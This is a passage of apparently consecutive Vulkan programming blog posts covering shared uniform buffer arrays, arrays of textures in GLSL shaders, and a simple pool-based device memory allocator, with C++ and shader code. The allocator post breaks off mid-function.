bufferInfo.buffer = demoData.sharedBuffer;
bufferInfo.offset = 0;
bufferInfo.range = VK_WHOLE_SIZE;

VkWriteDescriptorSet setWrite = {};
setWrite.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET;
setWrite.dstBinding = 0;
setWrite.dstArrayElement = 0;
setWrite.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER;
setWrite.descriptorCount = 1;
setWrite.dstSet = demoData.descriptorSet;
setWrite.pBufferInfo = &bufferInfo;
setWrite.pImageInfo = 0;

vkUpdateDescriptorSets(appContext.device, 1, &setWrite, 0, nullptr);

This up is completely identical to setting up a single uniform buffer object, because in practice, that’s exactly what’s going on. The only difference is that to make this work you have to keep a few more things in mind:

Ensuring Buffers Are The Same Size

I’ve already covered that you need to keep the uniform objects the same size, but how to do that is a bit different for Vulkan than it might be if you were working with solely cpu side structs. This is because struct members in Vulkan shaders are 16 byte aligned, which means that if you’re trying to manually specify the structs in your c++ code (like I do in my example project), you need to add some additional syntax to make sure if all adds up properly:

struct LayoutA
{
    __declspec(align(16)) glm::vec4 colorA;
    __declspec(align(16)) glm::vec4 colorB;
    __declspec(align(16)) glm::vec4 colorC;
};

struct LayoutB
{
    __declspec(align(16)) float r;
    __declspec(align(16)) glm::vec4 colorA;
    __declspec(align(16)) int x;
};

Unless you’re working with matrices, this actually ends up making your life easier, because any data type equal to or smaller than the size of a vec4 will fit inside 16 bytes, meaning that rather than worrying about the size of the struct members, you just worry about keeping the count the same. Once you add matrices, you have to start looking at sizes again.

Once the structs are set up, you just need some quick pointer math to get them into one buffer:

char* sharedData = (char*)malloc(sizeof(LayoutA) * BUFFER_ARRAY_SIZE);
LayoutA first = {glm::vec4(0.5,0,0,0), glm::vec4(0.25,0.5,0,0), glm::vec4(0.0,0.25,0.25,1)};
LayoutB second =  1.0, glm::vec4(1,1,1,1), 1};

char* writeLocation = sharedData;
memcpy(writeLocation, &first, SHARED_UNIFORM_SIZE);
memcpy((writeLocation += SHARED_UNIFORM_SIZE), &second, SHARED_UNIFORM_SIZE);

This works, but If you’re like me, you likely don’t want to have to recompile your c++ code every time a shader changes. In the past, I got around this by using a program I wrote for my material system (called the “ShaderPipeline”) that uses SPIR-V Cross to generate json descriptions of the shaders that I use. One part of this description are the sizes and offsets of each member of a uniform buffer object, but with the array of structs approach here, SpirV-Cross ends up just telling you details about the size of the entire array:

"descriptor_sets": [
{
   "set": 0,
   "binding": 0,
   "name": "DATA_48",
   "size": 384,
   "arrayLen": 1,
   "type": "UNIFORM",
   "members": [
       {
           "name": "data",
           "size": 384,
           "offset": 0
       }
   ]
}]

This isn’t super helpful, which I think means that I’m going to have to add some support for glsl comment annotations to let this tool spit out more information about the “DATA48” struct. However, my main point here is that this “array of structs” approach does not require you to recompile your c++ code to make shader changes. Once you know the offsets for each variable, you can just do some quick pointer math and write things where they need to go in a generic way.

Side Note: this ShaderPipeline tool is turning out to be way more useful than the material system demo. I think it’s soon going to need it’s own github repo.

A Potential Implementation Idea

I haven’t tried this out yet, so take it with a grain of salt, but it seems like this technique would make it possible to keep uniform data centralized in a few different memory pools, one for each size of uniform buffer object (ie: a pool for 48 byte buffers, a pool for 128 byte, etc). Whenever a material instance gets created, it just gets assigned a slot in the appropriate pool for it’s data. Then when it comes time to actually use the material, it just needs to know enough to pass the index (or indices in the case of multiple uniforms) via push constants to select the right data.

It might even be possible to use this separation of materials to figure out which thread should build the commands for drawing each object, so that each command list that gets built doesn’t necessarily even need to bind every one of these uniform arrays.

I think this is the approach I’m going to try first in the next non-demo project that I make with Vulkan (whatever/whenever that is), but as simple as it sounds on paper, there’s already at least one more factor that needs to be mentioned:

Handling Large Buffer Updates

This approach to uniform data runs into problems pretty quickly as you add more entries to the arrays of data. The vulkan spec states that:

Buffer updates performed with vkCmdUpdateBuffer first copy the data into command buffer memory when the command is recorded (which requires additional storage and may incur an additional allocation), and then copy the data from the command buffer into dstBuffer when the command is executed on a device.

The additional cost of this functionality compared to buffer to buffer copies means it is only recommended for very small amounts of data, and is why it is limited to only 65536 bytes.

Applications can work around this by issuing multiple vkCmdUpdateBuffer commands to different ranges of the same buffer, but it is strongly recommended that they should not.

So once we exceed 65536 bytes in one of our buffer pools, we need to find a different way to update the data there. With the 48 byte buffers we’re using above, we won’t hit that limit for a while, but a hypothetical 128 byte uniform buffer array would exceed the limit with only 512 entries.

It seems like the right way to address this is to limit the size of any vkBuffer that stores data that needs to be modified, and then just before the renderer begins assembling command lists, copy those buffers into a larger buffer that exceeds the 65536 limit. This approach will add some additional complexity to setting up material data / managing those buffer pools, but wouldn’t increase any complexity as far as our actual rendering logic is concerned… which I like.

Wrap Up

I’ll mention again that I haven’t actually tried this out in a real application, and it could be that there are performance costs associated with binding really large buffers, or some other performance gotcha that I’m going to run into with this approach (in fast, there’s almost certainly at least 10 things I’m not considering), but I really like this approach to working with uniform data, so I’m going to start giving it a shot in larger projects.

This was a really fun post to write and fun project to put together. Between my last post about texture arrays, and this one, I feel like I”m starting to get a good grip on how Vulkan handles Descriptor Sets, and how things map from GLSL to Vulkan.

As always, if you want to say hi, or point out something that I got wrong (or didn’t think about), send a message to @khalladay on Twitter or on Mastodon. Have a good one!

Using Arrays of Textures in Vulkan Shaders

2018-01-28T00:00:00+00:00

Lately I’ve been trying to wrap my head how to effectively deal with textures in Vulkan. I don’t want any descriptor sets that need to be bound on a per object basis, which means that just sticking each texture into it’s own set binding isn’t going to work. Instead, thanks to the Vulkan Fast Paths presentation from AMD, I’ve been looking into using a global array of textures that stores all my textures in a descriptor set that I can bind at the beginning of the frame.

The AMD presentation doesn’t actually cover how to set up an array of textures in Vulkan, and I couldn’t find a good explanation of how to do that anywhere online, so now that I’ve figured it out I want to post a quick tutorial on here about it for the next person who gets stuck. I’ll go more in depth about how this array fits into my material system in a later post, but for now I just want to cover the nuts and bolts of setting up a shader to use an array of texture.

One more thing to note before I get started: If you’re looking for a way to work with images of the same size, Sascha Willems has a great example of using a sampler2DArray in his Vulkan Examples Project. The advantage of using an array of textures instead of something like a sampler2DArray is that the array of textures approach supports storing multiple image sizes in the same array by default. I don’t know how much (if any) of a performance penalty you pay for using an array of textures over a sampler2DArray.

With all that said, the goal of this post is going to be to walk through how to set up a Vulkan app so that you can use a shader like this one:

#version 450 core
#extension GL_ARB_separate_shader_objects : enable

layout(set = 0, binding = 0) uniform sampler samp;
layout(set = 0, binding = 1) uniform texture2D textures[8];

layout(push_constant) uniform PER_OBJECT
{
	int imgIdx;
}pc;

layout(location = 0) out vec4 outColor;
layout(location = 0) in vec2 fragUV;

void main()
{
	outColor = texture(sampler2D(textures[pc.imgIdx], samp), fragUV);
}

I’ve put all the code for this up in an example project on github, which renders a full screen quad with the above shader, and changes what image is displayed by updated the imgIdx variable in the push constant, so feel free to grab that and take a look. I’m going to deep dive into parts of that code for the remainder of this post.

Setting Up The Descriptor Set Layout

Setting up a descriptor set binding to work with an array of textures looks very similar to setting it up to work with a single texture. The main difference is the “decsriptorCount” variable on the VkDescriptorSetLayoutBinding structure: with a single texture you’d set this to 1, whereas with an array of textures, you set that variable to the number of elements in your array. For the above shader, the layout binding structure for the texture array might look like this:

VkDescriptorSetLayoutBinding layoutBinding = {};
layoutBinding.descriptorCount = 8;
layoutBinding.binding = 1;
layoutBinding.stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT;
layoutBinding.descriptorType = VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE;
layoutBinding.pImmutableSamplers = 0;

In hindsight, this is pretty obvious, but it took me awhile to realize that “descriptorCount” was the right spot for this information.

Once the above is set up, you just create your DescriptorSet (and DescriptorSetLayout) like you would with any other layout binding types. The demo app I posted has a working example of all of that.

Writing the Descriptor Sets

Similar to the above, writing a texture array to a descriptor set is much more straightforward than it seems at first. The key is to have your VkDescriptorImageInfo structs already in an array. If you aren’t using a combined image sampler, you don’t actually need to fill in the sampler value on these structs. In my demo project, I set up this array like so:

VkDescriptorImageInfo	descriptorImageInfos[TEXTURE_ARRAY_SIZE];

for (uint32_t i = 0; i < TEXTURE_ARRAY_SIZE; ++i)
{
    demoData.descriptorImageInfos[i].sampler = nullptr;
    demoData.descriptorImageInfos[i].imageLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL;
    demoData.descriptorImageInfos[i].imageView = demoData.textures[i].view;
}

In a non contrived application, you likely won’t have all the imageViews already in a neat little array like this, but it doesn’t matter how those image views are laid out, as long as the DescriptorImageInfo structs you use are in an array of some kind.

Once you’ve set up those structs, setting up the rest of the WriteDescriptorSet for the array of textures is very simple:

VkWriteDescriptorSet setWrites[2];

setWrites[1] = {};
setWrites[1].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET;
setWrites[1].dstBinding = 1;
setWrites[1].dstArrayElement = 0;
setWrites[1].descriptorType = VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE;
setWrites[1].descriptorCount = TEXTURE_ARRAY_SIZE;
setWrites[1].pBufferInfo = 0;
setWrites[1].dstSet = demoData.descriptorSet;
setWrites[1].pImageInfo = demoData.descriptorImageInfos;

Note that just like earlier with the DescriptorSetLayoutBinding, the descriptorCount variable here is where you need to specify the length of your array.

GlslangValidator And Large Arrays

If you’re using the standable glslangvalidator tool from the glslang project, you’re going to run into some issues if you try to make a large array of textures (ie / more than 80). If you do that, you’ll see an error message like the following:

‘binding’ : sampler binding not less than gl_MaxCombinedTextureImageUnits (using array)

This was a problem for me because I want to keep all the textures used in any given frame bound, so my initial array size was set to 4096 (with all of those image views defaulting to the same image). As you probably guessed from the “gl_” prefix in the error being generated, this error doesn’t actually apply to Vulkan shaders, so if you’re sure that your shader will never be used by OpenGL, you need to tell the compiler not to worry about gl_MaxCombinedTextureImageUnits.

To do this, you need to create a device capabilities config file, like so:

 "glslangvalidator -c > myconfig.config"

It’s important that your file uses the .config extension, because that’s the extension that glslangvalidator will look for in it’s argument list to know if an alternate config file is being provided.

Once you have this config file, all you need to do is open it up in your favourite text editor and look for the “MaxCombinedTextureImageUnits” line:

MaxVertexAttribs 64
MaxVertexUniformComponents 4096
MaxVaryingFloats 64
MaxVertexTextureImageUnits 32
MaxCombinedTextureImageUnits 80
MaxTextureImageUnits 32

Change that 80 to a really big number and you’re on your way. One thing to note is that I ran into some issues when I did this originally because I generated the config file using powershell, which defaults to writing text files out using UCS2-LE text encoding. You don’t want that. Make sure that your cconfig file is set to a sane encoding, like UTF-8, otherwise the validator won’t be able to read the file back in properly.

Once you have your properly encoded, lots of textures using config file ready you are good to recompile your shader. This time, invoke the compiler like so:

glslangvalidator -V myfile.frag myconf.conf

As long as your config file uses the .conf extension, that should be all you need to get it to stop complaining and do its job.

That’s All Folks!

When all the above is done, you should be able to simply pass your array index via push constants the same way you’d pass anything else via push constants and be on your way. If anything above was unclear, let me point you again in the direction of the demo project on github, which will provide you with a relatively small working example.

Hopefully this was helpful! I realize it’s a short post, and there’s nothing here thats groundbreaking, but (imo), Vulkan needs more easily digestible tutorial content, so here this post is. In any case, if you want to say hi, send a message to @khalladay on Twitter or on Mastodon. Thanks for reading!

A Simple Device Memory Allocator For Vulkan

2017-12-13T00:00:00+00:00

Last month, I posted about the material system that I’ve been trying to piece together, and talked about how the next step for that system was going to be to extend it to handle material instances. This sounded like a great next step until I started building it and realized that in order for this to work with arbitrary data, I needed to sort out how I wanted to manage allocating arbitrary amounts of Vulkan device memory.

Vulkan only gives you a limited amount of allocations that you’re allowed to have active at one time (set by your gpu), so I can’t keep creating new allocations for every new material, and I definitely can’t for material instances. So instead of pressing forward with the material system, I took a quick detour to figure out how to write a memory allocator that would solve this problem for me.

If you’re not interested in the implementation details, GPUOpen already has a very capable memory allocator that’s open source and ready to use, and is way better than what I’ve put together (you can get it here) but I wanted to figure out how to write my own, which is what I’m going to talk about for the rest of this post.

I have no idea how to take a picture of an allocator

Understanding Vulkan Memory

The first thing I needed to take a look at was how exactly Vulkan memory worked, and there wasn’t a better spot than the output of vkGetPhysicalDeviceMemoryProperties

On my GPU (GTX 1060), this reported that my device had 2 memory heaps, one that was 6 GB, and one that was 16 GB, this was interesting because according to NVidia’s system stats, my gpu only has 14.2 GB of total graphics memory (and I never really figured out what this discrepancy was all about). However, the 6GB number made sense, since that’s how much dedicated video memory I have on my card.

The only other information given about these heaps was a “flags” variable. A quick look at the Vulkan docs reveals that there’s only one flag defined right now:

typedef enum VkMemoryHeapFlagBits {
    VK_MEMORY_HEAP_DEVICE_LOCAL_BIT = 0x00000001,
} VkMemoryHeapFlagBits;

Which makes sense because my 6 GB heap is listed with a flags value of 1, making it the device local memory (which is what I’d expect, given that it’s my dedicated memory), and the other heap has a flags value of 0, which I assume just means that anything goes with that heap.

The other thing returned by vkGetPhysicalDeviceMemoryProperties is an array of memory types. These are important because when you’re allocating memory pools, you can’t mix memory types, so unlike on the CPU where you can malloc up as much as you want and parcel it out to anything, in Vulkan, you need multiple large allocations that you parcel out from based on type.

Vulkan memory types are identified by what heap they belong to, and which of the following property bits they have set:

typedef enum VkMemoryPropertyFlagBits {
    VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT = 0x00000001,
    VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT = 0x00000002,
    VK_MEMORY_PROPERTY_HOST_COHERENT_BIT = 0x00000004,
    VK_MEMORY_PROPERTY_HOST_CACHED_BIT = 0x00000008,
    VK_MEMORY_PROPERTY_LAZILY_ALLOCATED_BIT = 0x00000010,
} VkMemoryPropertyFlagBits;

On my machine, using the above information, I could determine the following about the memory types I have available:

7 memory types that use Heap 1 (all graphics memory), but have none of the above properties (wtf?)
2 memory types which have the VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT property, and are located in heap 0 (dedicated memory)
1 memory type which have the VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT and VK_MEMORY_PROPERTY_HOST_COHERENT_BITproperties, located in heap 1
1 memory type which have the VK_MEMORY_PROPERTY_HOST_CACHED_BIT, VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, and VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT properties, in heap 1

Some of this makes sense, but wtf is going on with the duplicate memory types? Quick, REACT WITH BLAME!

This is NVidia’s Fault!

A quick jaunt over to the Vulkan Hardware Database shows that it’s only NVidia cards that have these extra memory types, and a quick trip to google turns up this article, which says that in additional to the memory types that Vulkan gives you, NVidia cards have additional types which are specialized for certain kinds of data. Fair enough, the problem is figuring out which of our mystery memory types are for what data.

Here’s where you really hope the article has an enum definition or something, but instead we get this:

A memory allocator that follows the rules and guidance of the Vulkan specification should be able to handle all these memory types gracefully by properly interpreting the VkMemoryRequirements::memoryTypeBits member when selecting an allocation for a specific resource.

Gee… thanks. Turns out, even when you’re working with Vulkan, you have to accept some amount of vendor specific magic behind the scenes.

Thankfully, the Vulkan spec gives us the exact bit of code we need to follow its “rules and guidance” when determining what memory type to use:

// Find a memory in `memoryTypeBitsRequirement` that includes all of `requiredProperties`
int32_t findProperties(const VkPhysicalDeviceMemoryProperties* pMemoryProperties,
                       uint32_t memoryTypeBitsRequirement,
                       VkMemoryPropertyFlags requiredProperties)
{
    const uint32_t memoryCount = pMemoryProperties->memoryTypeCount;

    for (uint32_t memoryIndex = 0; memoryIndex < memoryCount; ++memoryIndex)
    {
        const uint32_t memoryTypeBits = (1 << memoryIndex);
        const bool isRequiredMemoryType = memoryTypeBitsRequirement & memoryTypeBits;

        const VkMemoryPropertyFlags properties = pMemoryProperties->memoryTypes[memoryIndex].propertyFlags;
        const bool hasRequiredProperties = (properties & requiredProperties) == requiredProperties;

        if (isRequiredMemoryType && hasRequiredProperties)
        {
            return static_cast<int32_t>(memoryIndex);
        }
    }

    // failed to find memory type
    return -1;
}

So until I find a good reason to not use the above code exactly, I’m going to copy/paste the crap out of it.

Allocating Device Memory

The next thing I looked into was how to allocate device memory. I almost skipped this step, given that I’ve built a few projects already, and figured that calling vkAllocateMemory was about all there was to it. Turns out I was wrong and there were few things that I didn’t realize I needed to keep in mind. All this information comes from the vulkan spec page for vkAllocateMemory, so if you want to go straight to the source, there it is.

Here are all the things I didn’t know about allocating device memory before I looked there:

vkAllocateMemory is guaranteed to return an allocation that is aligned to the largest alignment requirement for your Vulkan implementation (ie: if one resource type needs to be 16 byte aligned, and another type 128 byte aligned, all vkAllocateMemory calls will be 128 bit aligned), so you never have to worry about the alignment of these allocs.
Some platforms limit the maximum size a single allocation can be, and this limit can be different for each memory type. So if you’re getting VK_ERROR_OUT_OF_DEVICE_MEMORY errors but don’t see an obvious cause, that may be it.
There is a limit to the amount of memory available in each memory heap your implementation provides (found in vkGetPhysicalDeviceMemoryProperties).
The vkAllocateMemory call has a parameter for a VkAllocationCallbacks structure, which can be used to provide custom allocators for host memory. I’m ignoring this today, but it’s good to know what that argument for.

Finally, as mentioned earlier, Vulkan limits the number of vkDeviceMemory allocations you can have active at one time. You can grab the limit from VkPhysicalDeviceLimits (on my gpu, the limit was 4096). If you try to exceed this limit, you get VK_ERROR_TOO_MANY_OBJECTS. This allocation count limit is the reason for all of this work: I don’t want to write a material instancing system that bogarts all my allocations.

Binding Memory And Freeing Resources

Assuming that all of the nuances of allocating memory have been properly handled, there’s still the matter of actually using that memory. In Vulkan, this means “binding” a buffer to some region of a vkDeviceMemory allocation. Luckily this is much more straightforward than allocating the memory: all you need to do is call a binding function, like one of these:

VkResult vkBindBufferMemory(
    VkDevice                                    device,
    VkBuffer                                    buffer,
    VkDeviceMemory                              memory,
    VkDeviceSize                                memoryOffset);

VkResult vkBindImageMemory(
    VkDevice                                    device,
    VkImage                                     image,
    VkDeviceMemory                              memory,
    VkDeviceSize                                memoryOffset);

Unlike vkAllocateMemory, which I brought up specifically to talk about all the gotchas, the functions used to bind memory are really simple. Instead, I’m mentioning this one to provide some info about how I decided on the structure of my allocator. Since any allocator that will solve the allocation count limit problem is going to be subdividing up large allocations, any call to allocate memory needs to return both the VkDeviceMemory handle for the large allocation we’re subdividing, and the offset into that allocation used for this specific resource so that the allocation can be bound correctly.

I ended up settling on this:

struct Allocation
{
    VkDeviceMemory handle;
    uint32_t type;
    uint32_t id;
    VkDeviceSize size;
    VkDeviceSize offset;
};

The only thing that may not be readily apparent is the id variable, which I’m adding since I’m assuming at some point I’ll need some extra bits to help find the allocation inside a memory pool.

It’s worth noting that once you bind memory to a Vulkan resource, the only way you can unbind that memory is to destroy the buffer, image, or whatever else that memory is bound too. You can free memory that’s currently bound to something (as long as you make sure to stop using whatever it was bound to), but you can’t decide to bind an allocated chunk of memory to something new until the original binding has been destroyed.

Whew, all that theory is finally out of the way! It’s time to actually build something.

A Basic Allocator Structure

For my project, all I did was define some function pointers for allocating things, and then have whatever allocator I wanted to use write to those pointers with its own functions. Sure, this means that I can’t have multiple allocators in use at once, but I think I’m having the right amount of fun just worrying about 1 allocator right now. I already have a global struct called vkh::Context (vkh is the namespace for my “vulkan helper” code), so I just added another member to this struct that looks like so:

struct AllocatorInterface
{
    //setup the allocator
    //args: vkh context structure
    void(*activate)(VkhContext*);

    //args: mem handle, size of alloc, mem type
    void(*alloc)(Allocation&, VkDeviceSize, uint32_t);

    //args: mem handle
    void(*free)(Allocation&);

    //args: memory type
    size_t(*allocatedSize)(uint32_t);

    //returns total number of active vulkan allocs
    uint32_t(*numAllocs);
};

The VkhContext structure can be found on github in vkh.h.

A Passthrough Allocator

To start things off, I decided that I wanted to build an allocator that did nothing, or rather, that just made the exact same calls that my program code was making otherwise, but routed through this “passthrough” allocator. This gave me a starting place for defining the interface I needed, and was pretty simple, since all my code already routed calls to allocate memory through two functions.

I’ll leave out the activate function because it’s specific to my program, and boring. Instead I want to start by showing off the allocate function:

void alloc(Allocation& outAlloc, VkDeviceSize size, uint32_t memoryType)
{
    state.totalAllocs++;
    state.memTypeAllocSizes[memoryType] += size;

    VkMemoryAllocateInfo allocInfo = vkh::memoryAllocateInfo(size, memoryType);
    VkResult res = vkAllocateMemory(state.context->device, &allocInfo, nullptr, &(outAlloc.handle));

    outAlloc.size = size;
    outAlloc.type = memoryType;
    outAlloc.offset = 0;

    checkf(res != VK_ERROR_OUT_OF_DEVICE_MEMORY, "Out of device memory");
    checkf(res != VK_ERROR_TOO_MANY_OBJECTS, "Attempting to create too many allocations")
    checkf(res == VK_SUCCESS, "Error allocating memory in passthrough allocator");
}

Ok, so this function is also pretty boring in the passthrough allocator, but there’s a couple of key things to note:

All the errors I mentioned earlier are checked for. The checkf function essentially a macro for an assert that prints a log message and pops up a message window if it fails.
Even though we aren’t using it in this allocator, the Allocation structure we’re returning gets it’s offset set to 0 so that we can pass the offset to bind calls later.

With the allocation code out of the way, the rest of the allocator interface is pretty boring to look at:

void free(Allocation& allocation)
{
    state.totalAllocs--;
    state.memTypeAllocSizes[allocation.type] -= allocation.size;
    vkFreeMemory(state.context->device, (allocation.handle), nullptr);
}

size_t allocatedSize(uint32_t memoryType)
{
    return state.memTypeAllocSizes[memoryType];
}

uint32_t numAllocs()
{
    return state.totalAllocs;
}

The entire source for this class is available on github, but the above is the part that matters for what I’m talking about right now.

What’s nice about this is that even though it really isn’t doing anything interesting, it at least gives us a bit more insight into our memory use, which is certainly useful by itself. For example I know that the material system demo app I posted last month needs 11 active allocations to render the frame, which is more than I knew last month when I wrote the thing.

A Better Allocator Structure

Despite being pretty useful, the passthrough allocator didn’t solve the allocation count problem that I needed solve. I needed to do something a bit more interesting.

So here’s what I ended up resolving to build (remember, I just wanted something functional, so don’t take any of this as a great idea):

The allocator needs separate memory pools, one for each type of vulkan memory (this is required by the spec anyway)
Each pool is made up of an array of large VkDeviceMeemory allocations and associated usage data about those allocations
When something needs memory, I’ll go through each large allocation, looking for the first large enough memory chunk in an allocation’s usage data
If no gap is found, I’ll create a new large allocation to use, and add it to that pool’s array.

There are lots of details that real allocators worry about that the above doesn’t begin to cover, but I’m already down this rabbit hole far enough for my liking right now, and this minimal allocator suits my current needs just fine.

How Subdividing Device Memory Works

The basics of subdividing device memory are simple - call vkBindDeviceMemory with a VkDeviceMemory to the allocation you’re subdividing, and use the offset argument to select where in that allocation to go, but I figured there had to be more to it than that. One of the things I was sure that I needed to figure out was how to decide how big to make my large allocations, or heck, even how big a memory page is on the gpu.

Reading through the spec (11.6. Resource Memory Association), I noticed the concept of “buffer-image granularity.” The description in the spec was fairly confusing, but what I took away from it is that in addition to alignment concerns when sub allocating from a larger device memory allocation, if you’re going to be using the same alloc for buffers and images, you also need to space them far enough apart within the alloc to satisfy this implementation defined value. If you screw this up, your validation layer let you know with the message:

Linear buffer 0xXX is aliased with non-linear image 0xXX which may indicate a bug. For further info refer to the Buffer-Image Granularity section of the Vulkan specification. >(https://www.khronos.org/registry/vulkan/specs/1.0-extensions/xhtml/vkspec.html#resources-bufferimagegranularity)

So I’m using this buffer-image granularity number as my page size for allocations, and only ever allocating large blocks which are a multiple of that size for simplicity.

Another thing to keep in mind is that different memory types can’t share the same VkDeviceMemory allocation, so we’ll need a memory pool for each memoryType returned for our GPU (on my card, this meant that I’d need up to 11 memory pools).

The Pool Allocator

Finally, we get to the good stuff. The Pool Allocator is what I ended up with after cramming all of the above into my head. I’ve talked about it enough already, so let’s actually get to the code. To start off, I want to talk about the couple of structs that I’m using to track allocators, and allocator state data:

struct OffsetSize { uint64_t offset; uint64_t size; };
struct BlockSpanIndexPair { uint32_t blockIdx; uint32_t spanIdx; };

struct DeviceMemoryBlock
{
    Allocation mem;
    std::vector<OffsetSize> layout;
};

struct MemoryPool
{
    std::vector<DeviceMemoryBlock> blocks;
};

struct AllocatorState
{
    VkhContext* context;

    std::vector<size_t> memTypeAllocSizes;
    uint32_t totalAllocs;

    uint32_t pageSize;
    VkDeviceSize memoryBlockMinSize;

    std::vector<MemoryPool> memPools;
};

So yeah… that’s a lot of nested vectors, but it works and that’s good enough for me right now. I’m sure someone reading this has strong opinions about a better way to structure this and I’d actually really love to hear about it on Twitter, but for this article, I’m going with the above.

The first two structs at the beginning are really just more convenient std::pairs, I hate pairs because .first and .second get really hard to read really fast, these just give me more useful member names.

The AllocatorState structure is the real meat of the above snippet. For the most part it’s probably pretty explanatory, but the few variables that aren’t probably make more sense in the context of the activate function, which is less boring than the passthrough allocator:

void activate(VkhContext* context)
{
    context->allocator = allocImpl;
    state.context = context;

    VkPhysicalDeviceMemoryProperties memProperties;
    vkGetPhysicalDeviceMemoryProperties(context->gpu.device, &memProperties);

    state.memTypeAllocSizes.resize(memProperties.memoryTypeCount);
    state.memPools.resize(memProperties.memoryTypeCount);

    state.pageSize = context->gpu.deviceProps.limits.bufferImageGranularity;
    state.memoryBlockMinSize = state.pageSize * 10;
}

I chose the minimum block size at random, and in practice that number is probably the most important one for making sure this allocator performs the best it can (ideally large enough that every large allocation will be able to be broken up by multiple requests). My app is so simple that I’m not worrying about using up all my graphics memory, so I probably could have made this 10x larger than it is, but that seemed like an even dumber idea than what I did.

The rest of that function pretty much documents itself, but without it, the allocate function would have made a lot less sense:

void alloc(Allocation& outAlloc, VkDeviceSize size, uint32_t memoryType)
{
    MemoryPool& pool = state.memPools[memoryType];

    //make sure we always alloc a multiple of pageSize
    VkDeviceSize requestedAllocSize = ((size / state.pageSize) + 1) * state.pageSize;
    state.memTypeAllocSizes[memoryType] += requestedAllocSize;

    BlockSpanIndexPair location;
    bool found = findFreeChunkForAllocation(location, memoryType, requestedAllocSize);

    if (!found)
    {
        location = { addBlockToPool(requestedAllocSize, memoryType), 0 };
    }

    outAlloc.handle = pool.blocks[location.blockIdx].mem.handle;
    outAlloc.size = size;
    outAlloc.offset = pool.blocks[location.blockIdx].layout[location.spanIdx].offset;
    outAlloc.type = memoryType;
    outAlloc.id = location.blockIdx;

    markChunkOfMemoryBlockUsed(memoryType, location, requestedAllocSize);
}

The most important thing to note in this function is that no matter how big the allocation we need is, the allocator rounds it up to the nearest multiple of our page size and uses that. The only thing that needs the originally asked for allocation size is the structure we’re returning to the caller (since it needs the correct size for the bind function).

This function itself is pretty straightforward, as are the couple of functions I haven’t pasted here. findFreeChunkForAllocation returns a location inside our target MemoryPool that can fit the allocation we want to make. If it can’t find space, we have to make space by adding a new block to the pool (that function returns the new block’s index in the memory pool), which is what addBlockToPool does.

Finally, after we build our allocation structure, we have to update the usage data for the DeviceMemoryBlock we’re using to make sure we know what regions of memory are already in use.

The code for all of these functions is on the github repo, (i’ve linked directly to the allocator’s .cpp file), so click through if you’re interested, I’m going to omit them here for brevity.

One function I’m not going to omit is the free function:

void free(Allocation& allocation)
{
    VkDeviceSize requestedAllocSize = ((allocation.size / state.pageSize) + 1) * state.pageSize;

    OffsetSize span = {allocation.offset, requestedAllocSize };

    MemoryPool& pool = state.memPools[allocation.type];
    bool found = false;
    for (uint32_t j = 0; j < pool.blocks[allocation.id].layout.size(); ++j)
    {
        if (pool.blocks[allocation.id].layout[j].offset == requestedAllocSize +allocation.offset)
        {
            pool.blocks[allocation.id].layout[j].offset = allocation.offset;
            pool.blocks[allocation.id].layout[j].size += requestedAllocSize;
            found = true;
            break;
        }
    }

    if (!found)
    {
        state.memPools[allocation.type].blocks[allocation.id].layout.push_back(span);
        state.memTypeAllocSizes[allocation.type] -= requestedAllocSize;
    }
}

Remember that the Allocation struct needed to have the non rounded-up size so it could bind properly, so the first thing we need to do is get the size of the memory chunk it will take up in one of our pools. After that, it’s just a matter of updating the usage data for the pool the allocation was from (which I store in the id variable of the struct). The logic I’m using to update the layout for the blocks is really simple, and is almost certainly unoptimal in a lot of scenarios, but it works for now and is short enough to paste into a blog post, so I’m going to go with it.

Also important to note: I’m not actually ever freeing memory right now, just reusing pages. In a big kid app, I’d probably need to change that.

The remaining parts of the AllocatorInterface that the pool allocator implements are as follows:

size_t allocatedSize(uint32_t memoryType)
{
	return state.memTypeAllocSizes[memoryType];
}

uint32_t numAllocs()
{
	return state.totalAllocs;
}

I’m going to go out on a limb and assume these don’t need explanation.

Putting all of this together and re running the MaterialDemo app shows that now I’m only using 4 active allocations to render the frame! That’s a big improvement over the 11 that I needed earlier. Mission success! Mostly…

The Problem Of Mapping Memory

Unfortunately, using the above code, I ended up with the following in my output log:

VkMapMemory: Attempting to map memory on an already-mapped object 0x1a

It appears to be incorrect to map the same vkDeviceMemory block more than once at the same time, even if you’re mapping different regions of the block of memory. This means that the pool allocator needs a bit more information about how we plan to use the memory that we get out of it, to decide whether it needs to put that allocation into it’s own chunk of memory, or if it can reuse an old one like I did above.

Any allocation that isn’t device local might be mapped at some point, so I decided to simply assume that if an allocation’s memory properties weren’t exactly VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT, I would give it its own allocation. Since the usage flags aren’t part of a standard VkMemoryAllocateInfo, this meant I had to define my own AllocateCreateInfo struct, and modify my AllocatorInterface a bit:

struct AllocationCreateInfo
{
    VkMemoryPropertyFlags usage;
    uint32_t memoryTypeIndex;
    VkDeviceSize size;
};

struct AllocatorInterface
{
    //this was the only function that changed
    void(*alloc)(Allocation&, AllocationCreateInfo);
};

This is probably better long term anyway, because at some point it will likely be handy to be able to pass even more data about how the allocation will be used to the alloc function, and now I have the place to do that.

The changes to the allocator itself are very minimal. First, I added a flag to the DeviceMemoryBlock struct to flag it as “reserved,” that is, not eligible for new allocations even if there is room:

struct DeviceMemoryBlock
{
    Allocation mem;
    std::vector<OffsetSize> layout;
    bool pageReserved;
};

Next, the allocation function needed to be modified to check if an allocation needed a whole page to itself, and to pass that info to the findFreeChunkForAllocation function. This flag forced the find function to return a totally DeviceMemoryBlock that will fit the allocation.

void alloc(Allocation& outAlloc, AllocationCreateInfo createInfo)
{
    //rest of code omitted for brevity
    bool needsOwnPage = createInfo.usage != VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT;
